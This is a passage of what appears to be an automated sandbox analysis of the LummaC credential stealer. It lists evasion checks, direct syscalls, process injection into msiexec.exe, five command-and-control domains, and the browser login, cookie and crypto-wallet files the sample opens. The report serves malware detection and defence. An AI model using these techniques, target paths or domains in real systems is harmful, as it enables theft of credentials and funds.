          Source: 7LUEA3.pif, 7LUEA3.pif, 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1584447675.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1644199350.0000000001566000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1644199350.000000000158B000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1642596205.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1584447675.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1724067337.00000000034CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696584680s
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
          Source: InstallUtil.exe, 0000000F.00000002.2490650779.000000000102D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696584680x
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696584680t
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
          Source: 7LUEA3.pif, 0000000C.00000003.1584447675.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
          Source: msiexec.exe, 00000005.00000003.1327603522.000000000650D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696584680p
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696584680o
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR]
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696584680f
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696584680j
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
          Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_5-26939
          Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09CA9AE8 rdtscp 12_3_09CA9AE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00319510 LdrInitializeThunk,5_2_00319510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188BA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_06188BA5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559BED VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,12_2_01559BED
          Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_008EE18A mov eax, dword ptr fs:[00000030h]0_2_008EE18A
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01565226 mov eax, dword ptr fs:[00000030h]12_2_01565226
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015533CD mov eax, dword ptr fs:[00000030h]12_2_015533CD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B2 mov eax, dword ptr fs:[00000030h]12_2_015592B2
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B2 mov eax, dword ptr fs:[00000030h]12_2_015592B2
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B9 mov eax, dword ptr fs:[00000030h]12_2_015592B9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B9 mov eax, dword ptr fs:[00000030h]12_2_015592B9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01543E9D mov eax, dword ptr fs:[00000030h]12_2_01543E9D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061993CA GetProcessHeap,5_2_061993CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188D32 SetUnhandledExceptionFilter,5_2_06188D32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188BA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_06188BA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0618E07D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0618E07D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188930 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_06188930
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifMemory protected: page write copy | page execute and write copy | page guard | page no cacheJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\Setup.exeNtSetInformationThread: Direct from: 0x8EEE2BJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeNtQuerySystemInformation: Direct from: 0x776D7B2EJump to behavior
          LummaC encrypted strings found
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: faintbl0w.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 300snails.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xc1aimbl0w.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thicktoys.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sliperyedhby.icu
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\choice.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 239330Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 309A008Jump to behavior
          Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\choice.exe C:\Windows\SysWOW64\choice.exeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: 7LUEA3.pif, 0000000C.00000003.1614534646.0000000009312000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099B1000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1603850920.00000000098CA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,5_2_06194678
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,5_2_0619B790
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_0619B417
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_0619B4B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_0619B53D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0619BA95
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_0619B3CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0619B8B9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,5_2_0619B120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,5_2_0619B9BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_061941A9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_015422E5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_015423EF
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,12_2_01547269
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,12_2_015472B5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,GetACP,12_2_01548801
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,12_2_01542C09
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dfc85a81 VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188D9C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_06188D9C
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01548245 GetVersionExA,12_2_01548245
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: msiexec.exe, 00000005.00000003.1341089958.00000000035BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: msiexec.exe, 00000005.00000003.1385076986.000000000358B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
          Source: msiexec.exe, 00000005.00000003.1385312815.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: msiexec.exe, 00000005.00000003.1385312815.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.dbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.jsonJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.dbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
